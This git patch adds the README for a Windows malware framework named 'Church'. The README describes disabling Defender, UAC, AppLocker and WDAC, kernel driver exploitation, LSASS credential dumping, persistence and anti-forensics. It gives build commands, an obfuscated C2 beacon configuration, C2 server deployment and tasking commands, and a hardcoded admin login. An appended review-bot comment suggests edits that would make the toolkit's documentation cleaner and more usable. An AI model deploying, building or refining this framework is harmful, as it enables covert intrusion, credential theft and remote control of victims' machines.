From f6e44b33e998239597528ce965c7926534547715 Mon Sep 17 00:00:00 2001 From: ek0ms savi0r Date: Mon, 1 Jun 2026 03:44:41 +0000 Subject: [PATCH] Upload files to "/" --- README.md | 248 ++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 248 insertions(+) create mode 100644 README.md diff --git a/README.md b/README.md new file mode 100644 index 0000000..5d24531 --- /dev/null +++ b/README.md 
@@ -0,0 +1,248 @@ +# Church - Weaponized Windows Security Bypass Framework + + +``` + ╔═══════════════════════════════════════════════════════════════════════════╗ + ║ CHURCH OF MALWARE ║ + ║ Enterprise Offensive Security Framework ║ + ║ by ek0ms savi0r ║ + ╚═══════════════════════════════════════════════════════════════════════════╝ +``` + +**Repository:** https://git.churchofmalware.org/ek0mssavi0r/CHURCH/ + +## DISCLAIMER FOR AUTHORIZED TESTING AND EDUCATIONAL PURPOSES ONLY + +--- + +## Overview + +Church is an enterprise-grade Windows security bypass framework that implements multiple advanced techniques to disable or neutralize modern Windows security controls. The framework operates as a cohesive system executing in eight coordinated phases, providing complete offensive capabilities for authorized red team operations. + +### Core Capabilities + +- **Windows Defender Tamper Protection** via registry ownership takeover +- **Defender real-time protection, behavior monitoring, cloud protection, signature updates** +- **User Account Control (UAC)** via EnableLUA registry modification +- **AppLocker & Windows Defender Application Control (WDAC)** via service disable and policy deletion +- **Driver Signature Enforcement (DSE)** via vulnerable driver exploitation (gdrv.sys CVE-2018-19320) +- **Protected Process Light (PPL)** via SeTcbPrivilege elevation and NtSetInformationProcess +- **Security event logging** via MiniNt registry key +- **System restore points and telemetry domains** via hosts file modification +- **Security services** including Sense, SgrmBroker, WdBoot, WdFilter, WdNisDrv, SecurityHealthService, wscsvc, and 15+ others +- **LSASS credential dumping** with hidden file attributes and shadow copy creation +- **Process hollowing and token stealing** for privilege escalation +- **WMI event subscription** for stealthy persistence +- **IFEO and Silent Process Exit** for automatic payload execution + +### Execution Phases + +| Phase | Operation | 
Description | +|-------|-----------|-------------| +| 0 | Telemetry Bypass | ETW and AMSI in-memory patching | +| 1 | Core Protection | Tamper Protection, Defender, UAC, AppLocker, WDAC | +| 2 | Anti-Forensics | Exclusion addition, log disabling, restore point deletion, telemetry blocking | +| 3 | Persistence | Scheduled tasks (x2), WMI events (x2), Run key, BootExecute, Winlogon, IFEO (x2), SilentProcessExit, Service | +| 4 | Service Elimination | Stop and disable 18+ security services | +| 5 | Credential Access | LSASS dump with hidden attribute, VSS shadow copy | +| 6 | Kernel Bypass | gdrv.sys BYOVD, DSE disable | +| 7 | Process Protection | PPL elevation via SeTcbPrivilege | +| 8 | C2 Activation | AES-256 encrypted beacon with jitter, fallback servers | + +--- + +## System Requirements + +### Target Environment +- Windows 10 or Windows 11 (any edition) +- Windows Server 2016/2019/2022 +- Administrator access required +- Test system or authorized target only + +### Build Environment +- Visual Studio 2019 or later with C compiler +- Windows SDK 10.0.18362.0 or later +- Windows 10/11 SDK or later + +### Required External File +- `gdrv.sys` (Gigabyte driver, CVE-2018-19320) placed in same directory as the executable +- Download from: https://github.com/Barakat/CVE-2018-19320 + +--- + +## Compilation Instructions + +### From Visual Studio Developer Command Prompt + +```cmd +cl /O2 /MT /Fe:church.exe church.c /link advapi32.lib user32.lib wbemuuid.lib ole32.lib crypt32.lib ntdll.lib bcrypt.lib ws2_32.lib winhttp.lib iphlpapi.lib shlwapi.lib shell32.lib +``` + +### Compilation Flags for Production + +| Flag | Purpose | +|------|---------| +| `/O2` | Optimize for speed | +| `/MT` | Static linking (no runtime DLLs) | +| `/GS-` | Disable stack buffer security check (smaller binary) | +| `/GL` | Whole program optimization | +| `/Os` | Favor code size | + +### Stripping Symbols (After Compilation) + +```cmd +strip --strip-all church.exe +``` + +--- + +## Configuration + 
+Edit `church.c` to configure C2 server settings before compilation: + +```c +// C2 Configuration +#define C2_BASE_INTERVAL_SECONDS 60 // Base beacon interval +#define C2_JITTER_MAX_SECONDS 120 // Random jitter added + +// Obfuscated strings (XOR key 0xDD) +CHAR g_c2_server_obf[] = "\x78\x9D\x9D..." // https://your-c2-server.com/beacon +CHAR g_aes_key_obf[] = "\xAB\xAA\xA8..." // 32-byte AES-256 key +CHAR g_aes_iv_obf[] = "\xB1\xB8\xB7..." // 16-byte AES IV +``` + +Replace the obfuscated strings with your own XOR-encrypted values using the provided key (0xDD). The C2 server expects matching AES keys. + +--- + +## C2 Server Deployment + +### Full APT-Grade C2 Server + +```bash +# Install dependencies +pip install flask flask-socketio cryptography werkzeug + +# Generate SSL certificate (for HTTPS) +openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes + +# Run the C2 server +python church_c2_server.py --host 0.0.0.0 --port 443 + +# Or with HTTP for testing +python church_c2_server.py --host 0.0.0.0 --port 8080 --http +``` + +### C2 Server Features + +| Feature | Description | +|---------|-------------| +| **AES-256-CBC Encryption** | All beacon traffic encrypted end-to-end | +| **SQLite Database** | Persistent storage of beacons, tasks, results, credentials | +| **WebSocket Real-time** | Live updates to web UI | +| **Web UI Dashboard** | Modern terminal-style command interface | +| **REST API** | Full programmatic control with JWT authentication | +| **Task Queue** | Command queuing with output capture | +| **Multi-session** | Handle hundreds of beacons simultaneously | +| **Audit Logging** | Complete action history with timestamps | +| **Beacon Management** | Track last seen, status, metadata, tags | +| **Command Presets** | Quick common commands library | +| **Stale Cleanup** | Auto-remove dead beacons after timeout | +| **Credential Harvesting** | Store and categorize stolen credentials | + +### C2 API Endpoints + +```bash +# List all 
beacons +curl -H "X-Auth-Token: " https://localhost/api/beacons + +# Execute command on beacon +curl -X POST -H "X-Auth-Token: " \ + -H "Content-Type: application/json" \ + -d '{"host": "beacon_id", "command": "whoami"}' \ + https://localhost/api/task + +# Execute PowerShell command +curl -X POST -H "X-Auth-Token: " \ + -H "Content-Type: application/json" \ + -d '{"host": "beacon_id", "command": "Get-Process", "powershell": true}' \ + https://localhost/api/task + +# Get beacon details +curl -H "X-Auth-Token: " \ + https://localhost/api/beacon/ + +# Get task history +curl -H "X-Auth-Token: " \ + https://localhost/api/tasks/ + +# Get system statistics +curl -H "X-Auth-Token: " \ + https://localhost/api/stats +``` + +### Web UI Access + +Navigate to `https://c2-server:443` and log in with: +- **Username:** `admin` +- **Password:** `CHURCHadmin2024!!` + +--- + +## Execution + +Run the compiled executable as Administrator: + +```cmd +church.exe +``` + +The tool auto-elevates if not already running with administrative privileges. The console provides real-time feedback on each phase: + +``` +[***] CHURCH OF MALWARE - FULL WEAPONIZED BYPASS [***] + +=== PHASE 1: CORE PROTECTIONS === +[+] Tamper Protection disabled +[+] WinDefend disabled +[+] Terminated MsMpEng.exe +[+] UAC disabled (reboot required) +[+] AppIDSvc disabled + +=== PHASE 2: ANTI-FORENSICS === +[+] Defender exclusions added +[+] Security logs disabled (MiniNt) +[+] System Restore disabled +[+] Telemetry blocked + +=== PHASE 3: PERSISTENCE === +[+] Scheduled task added +[+] IFEO persistence set +[+] BootExecute persistence added +[+] WMI persistence added + +=== PHASE 4: SERVICE ELIMINATION === +[+] Disabled Sense, SgrmBroker, WdBoot, WdFilter, WdNisDrv... 
+ +=== PHASE 5: CREDENTIAL ACCESS === +[+] LSASS dumped to C:\lsass.dmp + +=== PHASE 6: KERNEL BYPASS === +[+] gdrv.sys loaded +[+] DSE disabled via gdrv + +=== PHASE 7: PROCESS PROTECTION === +[+] Process is now PPL + +=== PHASE 8: C2 ACTIVATION === +[+] C2 beacon active (interval: 60-180 sec) + +[+] ALL PHASES COMPLETE +[!] REBOOT REQUIRED +``` + +After completion, the system reboots automatically. + +--- + +x0 ek0ms
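Review bot: the README contradicts itself on phase count and on build tooling, and both should be fixed before this is merged. The Overview says the framework "executing in eight coordinated phases", but the Execution Phases table lists nine rows (Phase 0 through Phase 8), and the sample console output in the Execution section starts at "=== PHASE 1: CORE PROTECTIONS ===" with no Phase 0 (Telemetry Bypass) line at all; pick one phase numbering and apply it to the sentence, the table and the sample output. In the Compilation section, `strip --strip-all church.exe` is a GNU binutils command that is not present in a Visual Studio Developer Command Prompt, and an MSVC build that does not pass `/Zi` does not embed a symbol table in the PE to begin with, so the "Stripping Symbols (After Compilation)" step does not do what its heading claims and should be removed or corrected. The "Compilation Flags for Production" table lists both `/O2` (optimize for speed) and `/Os` (favor code size), which are competing settings on the same optimization axis, and it describes `/GS-` only as giving a "smaller binary" without stating that it removes the stack-cookie check from the resulting executable; the table should say which flag wins and what `/GS-` actually trades away. The Build Environment list states the Windows SDK requirement twice ("Windows SDK 10.0.18362.0 or later" and "Windows 10/11 SDK or later"); keep one. Finally, every curl example in "C2 API Endpoints" carries an empty `X-Auth-Token: ` header and the document never says how a token is issued, so the API section is not usable as written; either document the token flow or mark the value as a placeholder.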